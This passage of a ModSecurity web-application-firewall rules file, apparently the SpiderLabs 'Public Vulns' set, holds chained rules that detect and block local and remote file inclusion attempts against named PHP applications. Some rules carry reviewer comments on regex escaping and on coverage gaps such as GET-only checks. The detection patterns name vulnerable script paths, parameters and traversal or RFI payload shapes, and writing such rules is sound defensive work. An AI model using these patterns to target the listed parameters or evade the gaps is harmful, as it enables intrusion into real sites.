"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009330,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6846/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:padmin "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyForum centre.php padmin Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010631) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /infusions/last_seen_users_panel/last_seen_users_panel.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010631,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File 
Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9018/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:settings[locale] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS MyFusion last_seen_users_panel.php settings Parameter Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009905) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /forum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009905,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8841/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[UTE][__tplCollection][a][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Unclassified NewsBoard forum.php __tplCollection Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009431) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /news_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009431,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5429/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:newsoffice_directory "@contains ../" 
"ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009432) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /news_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009432,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/5429/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:newsoffice_directory/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NewsOffice news_show.php newsoffice_directory Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010099) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS News Manager ch_readalso.php read_xml_include Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /ch_readalso.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010099,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS News Manager ch_readalso.php read_xml_include Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29251'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:read_xml_include/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS News Manager ch_readalso.php read_xml_include Parameter Remote File 
Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Nitrotech common.php root Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008922,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Nitrotech common.php root Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:root/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Nitrotech common.php root Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003694) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NoAH Remote Inclusion Attempt -- mfa_theme.php tpls SecRule REQUEST_LINE "@contains /modules/noevents/templates/mfa_theme.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003694,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS NoAH Remote Inclusion Attempt -- mfa_theme.php tpls',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3861'" SecRule REQUEST_LINE "@contains tpls[" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NoAH Remote Inclusion Attempt -- mfa_theme.php tpls',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009728) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /config.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009728,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34636'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains newlang=kacper" "chain" SecRule ARGS:languages[kacper][file] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS NotFTP config.php languages Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010355) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OBOphiX fonctions_racine.php chemin_lib parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /fonctions_racine.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010355,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS OBOphiX fonctions_racine.php chemin_lib parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule &TX:'/RFI.*ARGS:chemin_lib/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OBOphiX fonctions_racine.php chemin_lib parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009332) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion SecRule REQUEST_LINE "@contains /resource_categories_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009332,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE 
"@contains GET " "chain" SecRule ARGS:CLASSES_ROOT "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter local file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009333) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion SecRule REQUEST_LINE "@contains /resource_categories_view.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009333,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CLASSES_ROOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ODARS resource_categories_view.php CLASSES_ROOT parameter Remote file inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003741) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Open Translation Engine Remote Inclusion Attempt -- header.php ote_home SecRule REQUEST_LINE "@contains /skins/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003741,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Open Translation Engine Remote Inclusion Attempt -- header.php ote_home',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3838'" SecRule &TX:'/RFI.*ARGS:ote_home/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Translation Engine Remote Inclusion Attempt -- header.php ote_home',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # 
(2009395) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion SecRule REQUEST_LINE "@contains /ADM_Pagina.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009395,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-5063'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:Tipo/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009396) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion SecRule REQUEST_LINE "@contains /ADM_Pagina.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009396,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-5063'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:Tipo "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OTManager ADM_Pagina.php Tipo Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS openEngine filepool.php oe_classpath parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /filepool.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009164,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS openEngine filepool.php oe_classpath parameter Remote File 
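Inclusion',tag:'web-application-attack',tag:'bugtraq,31423'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:oe_classpath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS openEngine filepool.php oe_classpath parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009931) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible OpenSiteAdmin pageHeader.php Remote File Inclusion Attempt
# Chain of two rules, evaluated in phase 2:
#   1. REQUEST_LINE (after urlDecodeUni, htmlEntityDecode, normalisePathWin)
#      contains the pageHeader.php path.
#   2. ".php?" is followed within 300 characters by "=" and an http:, ftp:,
#      https: or ftps: scheme.
# Step 2 inspects REQUEST_URI instead of QUERY_STRING: QUERY_STRING begins
# after the "?" separator, so the ".php?" prefix required by the pattern is
# only present in the full URI (path plus query string).
# On a full match the last rule adds tx.critical_anomaly_score to
# tx.anomaly_score, records the matched variable under
# tx.<rule id>-WEB_ATTACK/RFI-<variable name> and adds audit log part E.
SecRule REQUEST_LINE "@contains /OpenSiteAdmin/pages/pageHeader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009931,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible OpenSiteAdmin pageHeader.php Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'"
    SecRule REQUEST_URI|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible OpenSiteAdmin pageHeader.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2011274) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS OpenX phpAdsNew phpAds_geoPlugin Parameter Remote File Inclusion Attempt
# Chain of three rules: the request line contains the lib-remotehost.inc.php
# path, the request line contains "GET ", and at least one TX variable whose
# name matches RFI.*ARGS:phpAds_geoPlugin exists.
# NOTE(review): that TX variable is presumably set by the generic CRS RFI
# rules for the same transaction; confirm they are loaded before this file.
SecRule REQUEST_LINE "@contains /libraries/lib-remotehost.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011274,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS OpenX phpAdsNew phpAds_geoPlugin Parameter Remote File Inclusion Attempt',tag:'web-application-attack'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:phpAds_geoPlugin/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS OpenX phpAdsNew phpAds_geoPlugin Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009459) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS classes init.php GLOBALS Parameter Remote File Inclusion
# Chain of three rules: the request line contains the logger/init.php path,
# the request line contains "GET ", and at least one TX variable whose name
# matches RFI.*ARGS:GLOBALS\[preloc\] exists.
# The TX selector between the slashes is a regular expression, so the square
# brackets are escaped. Unescaped, [preloc] is a character class (one of
# p, r, e, l, o, c) and cannot match the literal parameter name
# "GLOBALS[preloc]", which left this chain unable to fire.
# NOTE(review): the "@contains GET " step matches that substring anywhere in
# REQUEST_LINE and limits the chain to such requests; the same parameter sent
# in a request body is not covered by this chain.
SecRule REQUEST_LINE "@contains /modules/core/logger/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009459,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS classes init.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[preloc\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS classes init.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009460) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS newscat.php GLOBALS Parameter Remote File Inclusion
# Same three-step chain as rule 2009459, keyed on the newscat.php path.
# The brackets in the TX selector are escaped for the same reason: the
# selector is a regular expression and must match "GLOBALS[preloc]" literally.
SecRule REQUEST_LINE "@contains /newscat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009460,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS newscat.php GLOBALS Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:GLOBALS\[preloc\]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS newscat.php GLOBALS Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion
SecRule REQUEST_LINE "@contains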
/modules/core/security/init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009461,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS init.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009462) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage1.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009462,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage1.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009463) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage4.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009463,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains 
../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage4.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009464) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /stage6.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009464,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,29820'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:GLOBALS[preloc] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Orlando CMS stage6.php GLOBALS Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009871) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPauction GPL converter.inc.php include_path Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/converter.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009871,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPauction GPL converter.inc.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28284'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPauction GPL converter.inc.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009872) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 
PHPauction GPL messages.inc.php include_path Parameter Remote File Inclusion
# --- Reviewer notes for the rules below ---
# Each chain starts with a case-sensitive substring match on REQUEST_LINE
# (after urlDecodeUni, htmlEntityDecode and normalisePathWin) for the script
# path; some chains then also require the request line to contain "GET ".
# The last link either counts TX entries whose name matches
# /RFI.*ARGS:<param>/ (the leading & yields a count) or tests the argument or
# the query/body text directly. On a match it adds audit-log part E, sets
# tx.msg, adds tx.critical_anomaly_score to tx.anomaly_score and stores the
# matched value under tx.<rule.id>-WEB_ATTACK/RFI-<matched_var_name>.
# NOTE(review): the &TX links can only fire if an earlier rule has already
# stored a ...WEB_ATTACK/RFI-ARGS:<param> entry - presumably the generic RFI
# rules; confirm those are loaded and run before this file.
# NOTE(review): chains with the "GET " link do not score the same parameter
# when it arrives with another method; review that link where the application
# also reads the parameter from a request body.
# NOTE(review): the TX name patterns are not anchored at the end, so e.g.
# ARGS:config also counts entries for longer names that begin with "config".
SecRule REQUEST_LINE "@contains /includes/messages.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009872,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPauction GPL messages.inc.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28284'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPauction GPL messages.inc.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2009873) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPauction GPL settings.inc.php include_path Parameter Remote File Inclusion
SecRule REQUEST_LINE "@contains /includes/settings.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009873,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS PHPauction GPL settings.inc.php include_path Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28284'"
    SecRule REQUEST_LINE "@contains GET " "chain"
    SecRule &TX:'/RFI.*ARGS:include_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPauction GPL settings.inc.php include_path Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003742) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- language.php config
SecRule REQUEST_LINE "@contains /includes/language.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003742,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- language.php config',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'"
    SecRule &TX:'/RFI.*ARGS:config/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- language.php config',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003743) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_admin_cfg.php Root_Path
SecRule REQUEST_LINE "@contains /layout_admin_cfg.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003743,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_admin_cfg.php Root_Path',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3837'"
    SecRule &TX:'/RFI.*ARGS:Root_Path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_admin_cfg.php Root_Path',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'"

# (2003744) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChess Remote Inclusion Attempt -- layout_cfg.php Root_Path
